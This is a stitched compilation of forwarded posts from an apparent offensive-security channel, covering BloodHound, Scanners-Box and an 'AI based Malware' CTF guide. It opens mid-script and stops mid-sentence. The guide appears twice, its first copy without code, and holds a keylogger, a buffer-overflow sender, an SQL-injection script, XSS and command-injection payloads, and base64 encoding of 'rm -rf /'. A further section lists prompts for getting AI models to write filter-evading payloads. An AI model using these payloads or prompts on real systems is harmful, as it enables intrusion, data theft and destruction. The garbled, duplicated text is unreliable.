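if __name__ == "__main__":
    report = analyze_payload(SAMPLE_PAYLOAD)
    print(f"Target: {report['header'].get('Target')}  total delay: {report['delay_ms']} ms")
    print("Would type:", repr(report["typed"]))
    for issue in report["issues"]:
        print("issue:", issue)
```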
Forwarded from Exploiting Crew (Pr1vAt3)
Game changer. Microsoft open-sourced bitnet.cpp, you can now run 100B LLMs locally without a GPU needed.
The framework quantizes LLMs to 1-bit precision and runs inference directly on CPUs, making large language models accessible on standard hardware.
Technical details:
- Forked from llama.cpp with optimizations for 1-bit inference
- Handles models up to 100B parameters locally
- Achieves 6.17x speedup compared to standard inference
- Reduces energy consumption by 82.2%
- Works on standard CPUs without specialized hardware
Repo: https://lnkd.in/guEhH8ad
---
Are you an AI developer? Check out https://AlphaSignal.ai to get a daily summary of breakthrough models, repos and papers in AI. Read by 200,000+ devs.
Forwarded from Exploiting Crew (Pr1vAt3)
Monitoring: BloodHound is a powerful tool for analyzing and visualizing Active Directory environments. It assists penetration testers and system administrators in identifying weak permissions, potential attack paths, and privilege escalation opportunities within a Windows domain.
---
### GitHub Repository:
[BloodHound GitHub](https://github.com/BloodHoundAD/BloodHound)
---
### Features:
1. Active Directory Enumeration:
- Maps domain trust relationships.
- Identifies paths to high-value targets like Domain Admins.
- Highlights risky ACLs and misconfigurations.
2. Graph Visualization:
- Displays a clear graph of domain objects and their relationships.
- Uses queries to highlight exploitable paths and vulnerabilities.
3. Neo4j Database Integration:
- Stores collected AD data for analysis.
- Allows querying via Cypher language for complex insights.
4. Cross-Platform Support:
- Runs on Windows, macOS, and Linux.
---
### Use Cases:
1. Privilege Escalation:
- Identifies attack paths from low-privileged users to domain administrators.
2. Lateral Movement:
- Maps routes through machines, groups, and users for lateral traversal.
3. Audit & Mitigation:
- Assists administrators in identifying weak spots and tightening security.
---
### How It Works:
1. Data Collection:
Use SharpHound, the data collector, to gather information from the domain.
Example:
```powershell
SharpHound.exe -c All
```
This collects data about users, groups, permissions, trusts, and ACLs.
2. Data Import:
Import the collected JSON files into BloodHound.
3. Querying:
Use predefined or custom Cypher queries to identify attack paths.
Example Query:
```cypher
MATCH (n:User {name:"John"})-[r:AdminTo]->(m:Computer) RETURN n,m
```
This finds all computers where "John" has administrative rights.
---
### Visualization Example:
A graphical representation might show:
- Nodes: Users, groups, computers, and domains.
- Edges: Relationships like group memberships, session hosts, and admin rights.
---
### Installation:
1. Neo4j Database:
- Download and install from [Neo4j](https://neo4j.com/).
- Start the database service.
2. BloodHound:
- Clone the repository or download the release binaries.
- Run the BloodHound GUI.
---
### Additional Tools:
- SharpHound: Data collection tool for Windows environments.
- AzureHound: Gathers data for Azure AD.
This tool is essential for auditing AD security and simulating attacker behavior in penetration testing engagements.
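The Cypher query above returns John's direct AdminTo edges. As an added example (not BloodHound or SharpHound code), the Python below reproduces that question over a small constructed graph and goes one step further to the question BloodHound exists to answer: the shortest path from a user to Domain Admins across MemberOf, AdminTo and HasSession edges, the same "nodes and edges" model the visualization section describes. The graph, domain and principal names are constructed for illustration.

```python
"""Attack-path search over a BloodHound-style graph.

Added example, not BloodHound or SharpHound code. Users, groups and computers
are nodes; MemberOf, AdminTo and HasSession are directed edges. Real data
comes from SharpHound JSON loaded into Neo4j; here it is constructed inline
so the path logic can be read and run on its own.
"""
from collections import deque

# Constructed sample graph as (source, relationship, target) triples, using the
# legacy BloodHound naming convention NAME@DOMAIN for users and groups.
# Edge direction follows BloodHound: Computer -[HasSession]-> User.
EDGES = [
    ("JOHN@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("JOHN@CORP.LOCAL", "AdminTo", "WS02.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "ADMIN_SVC@CORP.LOCAL"),
    ("ADMIN_SVC@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("ALICE@CORP.LOCAL", "MemberOf", "SALES@CORP.LOCAL"),
]


def build_graph(edges):
    """Adjacency list: node -> list of (relationship, neighbour)."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph


def effective_groups(graph, principal):
    """The principal plus every group reached through (nested) MemberOf edges."""
    seen, stack = {principal}, [principal]
    while stack:
        node = stack.pop()
        for rel, nxt in graph.get(node, []):
            if rel == "MemberOf" and nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen


def admin_to(graph, user):
    """Computers the user administers directly or through group membership.

    The Cypher query on the page lists only direct AdminTo edges from the
    user; following MemberOf chains first is how BloodHound derives the
    user's effective local admin rights.
    """
    computers = set()
    for principal in effective_groups(graph, user):
        for rel, dst in graph.get(principal, []):
            if rel == "AdminTo":
                computers.add(dst)
    return sorted(computers)


def shortest_path(graph, start, goal):
    """Breadth-first search over every edge type.

    Returns the path as a list of (source, relationship, target) hops
    (empty when start == goal), or None when the goal is unreachable.
    """
    parents = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            hops = []
            while parents[node] is not None:
                prev, rel = parents[node]
                hops.append((prev, rel, node))
                node = prev
            return hops[::-1]
        for rel, nxt in graph.get(node, []):
            if nxt not in parents:
                parents[nxt] = (node, rel)
                queue.append(nxt)
    return None


GRAPH = build_graph(EDGES)

if __name__ == "__main__":
    print("John is admin to:", admin_to(GRAPH, "JOHN@CORP.LOCAL"))
    path = shortest_path(GRAPH, "JOHN@CORP.LOCAL", "DOMAIN ADMINS@CORP.LOCAL")
    for src, rel, dst in path or []:
        print(f"  {src} -[{rel}]-> {dst}")
```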
Forwarded from Exploiting Crew (Pr1vAt3)
All-in-one toolkit Scanners-Box
Description: Scanners-Box is an all-in-one toolkit that consolidates various scanning utilities for penetration testers, security analysts, and system administrators. It helps with network reconnaissance, vulnerability assessment, and information gathering. The framework simplifies the management and execution of multiple scanning tools in a unified environment.
---
### GitHub Repository:
[Scanners-Box GitHub](https://github.com/We5ter/Scanners-Box)
---
### Features:
1. Comprehensive Scanning Tools:
- Includes tools for port scanning, vulnerability assessment, subdomain enumeration, and more.
- Aggregates commonly used scanners like Nmap, Nikto, and masscan.
2. Modular Design:
- Flexible configuration allows adding custom tools and scripts.
- Easily integrates new scanning functionalities.
3. Automation:
- Automates repetitive scanning tasks.
- Batch scanning capabilities for multiple targets.
4. Cross-Platform Support:
- Works on Windows, Linux, and macOS systems.
5. Custom Scripts:
- Leverages Python and bash scripts for tailored tasks.
---
### Use Cases:
1. Port and Service Scanning:
- Quickly identify open ports and running services on target systems.
2. Subdomain Enumeration:
- Gather subdomains and perform DNS resolution checks.
3. Web Server Vulnerability Scanning:
- Analyze web servers for known vulnerabilities using integrated tools like Nikto.
4. Network Reconnaissance:
- Map out networks and identify potential entry points for further exploitation.
5. Vulnerability Assessment:
- Assess the security posture of networks and web applications.
---
### Key Tools Included:
1. Port Scanners:
- Nmap
- masscan
- unicornscan
2. Vulnerability Scanners:
- Nikto
- OpenVAS
- wapiti
3. Web Application Scanners:
- w3af
- Arachni
- Burp Suite integration
4. Subdomain Enumeration:
- Sublist3r
- Amass
- assetfinder
5. DNS and OSINT:
- dnsenum
- theHarvester
---
### Installation:
1. Clone the repository:
```shell
git clone https://github.com/We5ter/Scanners-Box.git
```
2. Navigate to the directory:
```shell
cd Scanners-Box
```
3. Run the setup script:
```shell
bash install.sh
```
---
### Example Usage:
- Subdomain Scanning:
```shell
python3 subdomain.py --target example.com
```
- Port Scanning with Nmap:
```shell
python3 nmap_scan.py --target 192.168.1.1
```
- Vulnerability Scanning:
```shell
python3 nikto_scan.py --target example.com
```
---
### Advantages:
- Consolidates multiple tools in one framework.
- Reduces setup time for scanning tasks.
- Easily customizable and extendable.
This toolkit is invaluable for quickly setting up comprehensive scans in penetration testing and vulnerability assessment workflows.
Automated Collection of Vulnerabilities and Their Fixes from Open-Source Software
https://github.com/secureIT-project/CVEfixes
Forwarded from Exploiting Crew (Pr1vAt3)
Creating AI based Malware
Creating and Solving Challenges with AI Safeguards
Before proceeding, it's crucial to highlight that creating malware, participating in malicious activities, or circumventing ethical guidelines is against responsible and lawful use of technology.
### Step-by-Step Approach to Solve AI-based CTFs
#### 1. Understand the Challenge Context:
- Category: Identify if it's reverse engineering, binary exploitation, web exploitation, cryptography, or malware analysis.
- Analyze the Objective: Read the challenge carefully to determine what needs to be achieved (e.g., decode, extract, or manipulate).
#### 2. Leverage AI for Analysis:
Use AI-based tools to analyze or automate repetitive tasks:
- Binary Analysis: Use frameworks like Ghidra or Radare2 for reverse engineering.
- Automate Patterns: Leverage Python with AI libraries like OpenAI or TensorFlow for pattern recognition or automated testing.
#### 3. Code Malware-like Behavior (Legally for Educational Purposes):
When solving a CTF, you may encounter situations mimicking malware functionality:
- Payload Analysis: Decrypt encoded payloads using tools like CyberChef.
- Code Automation:
- Example: Create a keylogger (for analysis, NOT deployment):
#### 4. Exploit Development:
- Use tools like Metasploit or custom scripts to simulate the exploitation phase.
- Example of a buffer overflow simulation (basic concept):
#### 5. AI-assisted Malware Analysis:
- Dynamic Analysis: Use sandboxing tools like Cuckoo Sandbox to observe malware behavior in a controlled environment.
- Static Analysis: Utilize AI models to classify potential threats from a binary.
#### 6. Reverse Engineer the Challenge:
- Use tools like IDA Pro or Binary Ninja to decompile and analyze binaries.
- Example: Identifying a hardcoded key in a binary:
- Use Ghidra to navigate to the main function and identify key variables.
#### 7. Test with Custom AI Scripts:
Automate solving repetitive tasks:
- Password Cracking:
- Use AI to brute force or pattern match probable passwords.
- Example: Use
- Web Exploitation:
- Automate SQL injection:
#### 8. Validate and Optimize:
- Use AI tools to simulate attack scenarios and validate success.
- Example: Use machine learning models for detecting evasion in traffic.
---
### Recommendations and Guidelines:
- Focus on solving CTFs ethically and using skills for legitimate purposes like penetration testing or cybersecurity research.
- Follow rules to ensure fair play and improve your knowledge responsibly.
- Leverage tools like AI models for accelerating repetitive tasks, but always align their use with ethical guidelines.
If you're facing specific challenges in a CTF, feel free to describe them, and I'll help guide you through solving them!
Creating and Solving Challenges with AI Safeguards
Before proceeding, it's crucial to highlight that creating malware, participating in malicious activities, or circumventing ethical guidelines is against responsible and lawful use of technology.
### Step-by-Step Approach to Solving AI-based CTFs
#### 1. Understand the Challenge Context:
- Category: Identify if it's reverse engineering, binary exploitation, web exploitation, cryptography, or malware analysis.
- Analyze the Objective: Read the challenge carefully to determine what needs to be achieved (e.g., decode, extract, or manipulate).
#### 2. Leverage AI for Analysis:
Use AI-based tools to analyze or automate repetitive tasks:
- Binary Analysis: Use frameworks like Ghidra or Radare2 for reverse engineering.
- Automate Patterns: Leverage Python with libraries such as the OpenAI API client or TensorFlow for pattern recognition or automated testing.
#### 3. Code Malware-like Behavior (Legally for Educational Purposes):
When solving a CTF, you may encounter situations mimicking malware functionality:
- Payload Analysis: Decrypt encoded payloads using tools like CyberChef.
- Code Automation:
- Example: Create a keylogger (for analysis, NOT deployment):
```python
from pynput import keyboard

def on_press(key):
    try:
        print(f"Key {key.char} pressed")
    except AttributeError:
        print(f"Special key {key} pressed")

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()
```
#### 4. Exploit Development:
- Use tools like Metasploit or custom scripts to simulate the exploitation phase.
- Example of a buffer overflow simulation (basic concept):
```python
import socket

target_ip = "127.0.0.1"
target_port = 9999
payload = b"A" * 1024  # Overflow buffer size

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
s.close()
```
#### 5. AI-assisted Malware Analysis:
- Dynamic Analysis: Use sandboxing tools like Cuckoo Sandbox to observe malware behavior in a controlled environment.
- Static Analysis: Utilize AI models to classify potential threats from a binary.
#### 6. Reverse Engineer the Challenge:
- Use tools like IDA Pro or Binary Ninja to decompile and analyze binaries.
- Example: Identifying a hardcoded key in a binary:
- Use Ghidra to navigate to the main function and identify key variables.
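Before the manual Ghidra walk-through, a first automated pass over the binary narrows down where to look. As an added example (not from the original post), this Python script extracts printable strings from a constructed sample binary, the way `strings -n 8` does, and flags those that carry a key-like label or have the high entropy of key material; the sample bytes, label regex and entropy threshold are my own constructed choices:

```python
import math
import re

# Constructed sample "binary": printable strings embedded between non-text bytes.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x90" * 12
    + b"Usage: tool [options]\x00"
    + b"api_key=9f86d081884c7d659a2feaa0c55ad015\x00"  # labelled hex value
    + b"\x00\x13\x37" * 5
    + b"Hello, world!\x00"
    + b"dGhpcyBpcyBub3QgYSByZWFsIGtleQ==\x00"          # unlabelled base64-looking token
    + b"secret: S3cr3t-H4rdc0d3d-K3y!\x00"
)

STRING_RE = re.compile(rb"[\x20-\x7e]{8,}")   # printable ASCII runs, like `strings -n 8`
KEY_LABEL_RE = re.compile(r"(key|secret|passw|token)\s*[:=]", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character: random-looking hex or base64 scores high, prose lower."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def extract_strings(blob: bytes) -> list:
    return [m.group().decode("ascii") for m in STRING_RE.finditer(blob)]


def find_candidate_secrets(blob: bytes, min_entropy: float = 3.5) -> list:
    """Return (string, entropy) for strings that carry a key-like label or, when they
    are a single whitespace-free token, look random enough to be key material."""
    hits = []
    for s in extract_strings(blob):
        label = KEY_LABEL_RE.search(s)
        value = s[label.end():].strip() if label else s   # entropy of the value, not the label
        entropy = round(shannon_entropy(value), 2)
        if label or (" " not in value and entropy >= min_entropy):
            hits.append((s, entropy))
    return hits
```

Short prose strings such as the usage banner score surprisingly high on entropy alone, which is why the unlabelled path also requires a whitespace-free token.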
#### 7. Test with Custom AI Scripts:
Automate solving repetitive tasks:
- Password Cracking:
- Use AI to brute force or pattern match probable passwords.
- Example: Use hashcat for password recovery.
- Web Exploitation:
- Automate SQL injection:
```python
import requests

target_url = "http://example.com/login"
payload = {"username": "' OR 1=1 --", "password": ""}
response = requests.post(target_url, data=payload)
print(response.text)
```
#### 8. Validate and Optimize:
- Use AI tools to simulate attack scenarios and validate success.
- Example: Use machine learning models for detecting evasion in traffic.
---
### Recommendations and Guidelines:
- Focus on solving CTFs ethically and using skills for legitimate purposes like penetration testing or cybersecurity research.
- Follow CTF rules to ensure fair play and improve your knowledge responsibly.
- Leverage tools like AI models for accelerating repetitive tasks, but always align their use with ethical guidelines.
If you're facing specific challenges in a CTF, feel free to describe them, and I'll help guide you through solving them!
Example AI Filter Bypass
AI gives us prompts to bypass its filters
Crafting prompts or solutions to bypass ethical filters in a CTF scenario requires careful handling to ensure compliance with ethical guidelines, lawful practices, and the intended educational purposes of the challenge. Here's how to approach solving CTFs using AI responsibly:
---
### 1. Understand the Challenge
- Identify Filters: What type of filter or protection is in place? (e.g., WAF, input validation, rate limits).
- Analyze the Scope: Are you working with web input, network traffic, or system-level constraints?
---
### 2. AI-Assisted Prompts for Analysis
Leverage AI tools like ChatGPT, GPT-4, or custom LLMs to assist in analyzing and solving CTFs. Below are ethical and focused prompts:
#### Input Validation or WAF Bypass
- Prompt:
- *"Generate a list of obfuscated SQL payloads to test input validation mechanisms, ensuring they align with ethical penetration testing practices."*
- *"How can I encode payloads to bypass basic web filters while remaining within educational use?"*
#### Payload Generation for Testing
- Prompt:
- *"What are effective URL-encoding methods to test a web application's XSS filter?"*
- *"Explain how base64 encoding can be applied to payloads for safe testing of filters in CTFs."*
#### Analyzing Network or Application Behavior
- Prompt:
- *"Suggest methods to analyze rate-limiting strategies in a web application during a CTF."*
- *"What are common header manipulations that can help test a web firewall in a controlled environment?"*
---
### 3. Practical AI-Assisted Payload Creation
Below are some examples of payloads and bypass techniques for testing in CTFs, ensuring lawful use:
#### SQL Injection (Obfuscated Inputs)
- AI-generated prompt:
*"Craft an SQL injection payload that uses hex encoding or alternative comment syntax to bypass basic filters."*
- Example:
```sql
' OR 1=1;--
```
#### XSS (Input Sanitization Bypass)
- AI-generated prompt:
*"Provide an XSS payload that utilizes uncommon attributes or event handlers to bypass sanitization filters."*
- Example:
```html
<img src="x" onerror="alert('')">
```
#### Command Injection (Encoding Payloads)
- AI-generated prompt:
*"Explain how to encode command injection payloads to evade simple validation mechanisms."*
- Example:
```shell
; ls -la;
```
---
### 4. AI-Assisted Automation
#### Testing HTTP Parameters
- Prompt:
*"Generate Python code for fuzzing HTTP parameters using a predefined payload list in a CTF environment."*
- Code:
```python
import requests

target_url = "http://example.com/vulnerable-endpoint"
payloads = ["' OR 1=1 --", "<script>alert(1)</script>", "&& cat /etc/passwd"]
for payload in payloads:
    response = requests.get(target_url, params={"input": payload})
    print(f"Payload: {payload}, Response: {response.status_code}")
```
#### AI-Based Encoding
- Prompt:
*"Explain how to encode attack payloads using techniques like URL encoding or base64 to test input filters."*
- Code Example:
```python
import base64

payload = "rm -rf /"
encoded_payload = base64.b64encode(payload.encode()).decode()
print(f"Encoded Payload: {encoded_payload}")
```
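The encoding tricks in sections 3 and 4 defeat only filters that match on the raw input; the check a validator or WAF actually needs is to canonicalize first and match second. As an added example (not part of the original post), this Python function peels URL, hex and base64 layers until the value stops changing, then matches the three payload families the page shows; the `canonicalize` and `is_suspicious` names, the signatures and the round limit are my own assumptions:

```python
import base64
import binascii
import re
from urllib.parse import unquote


def _try_hex(s: str):
    # Hex is the stricter alphabet, so it is tried before base64.
    if len(s) < 8 or len(s) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    try:
        return bytes.fromhex(s).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def _try_base64(s: str):
    # Accept only well-formed base64 that decodes to text; short tokens are
    # skipped because ordinary words would otherwise "decode" to garbage.
    if len(s) < 8 or len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Strip URL, hex and base64 encoding layers until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)                    # handles %27 and double-encoded %2527
        if decoded == value:
            decoded = _try_hex(value) or _try_base64(value) or value
        if decoded == value:
            break
        value = decoded
    return value


# Constructed signatures for the three payload families shown on the page.
SUSPICIOUS = [
    re.compile(r"'\s*or\s+1\s*=\s*1", re.I),          # ' OR 1=1 --
    re.compile(r"<\s*(script|img)\b", re.I),         # <script>, <img onerror=...>
    re.compile(r"(^|[;&|])\s*(rm|ls|cat)\b", re.I),  # ; ls -la, && cat ...
]


def is_suspicious(value: str) -> bool:
    # Match on the canonical form, so an encoding layer alone does not evade the check.
    return any(p.search(canonicalize(value)) for p in SUSPICIOUS)
```

The round limit bounds the work an attacker can force with deeply nested encodings; a production filter would also reject input that is still changing when the limit is reached.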
---
### 5. Top AI Prompts for Problem-Solving in CTFs
Here are adaptable prompts for specific challenges:
1. Input Validation Bypass:
*"What are common bypass techniques for input validation using encoding, transformations, or special characters?"*
2. Filter Detection:
*"How can I use timing analysis to detect the presence of a web application firewall in a CTF setting?"*
3. Automation Strategies:
*"Provide a Python script for automating brute-force testing of input fields while respecting ethical boundaries."*
4. Reverse Engineering Assistance:
*"Explain how to identify hardcoded secrets in a binary file using reverse engineering tools."*
5. Advanced Obfuscation:
*"What are creative ways to obfuscate payloads for educational CTFs while maintaining execution?"*
---
Forwarded from Exploiting Crew (Pr1vAt3)
Setting up a 2024 Drupal vulnerability:
After installing the Drupal application, the developer can change the hash_salt variable on line 268 of the /sites/default/settings.php file. As advised in the example, the developer can read it from a file using the file_get_contents function: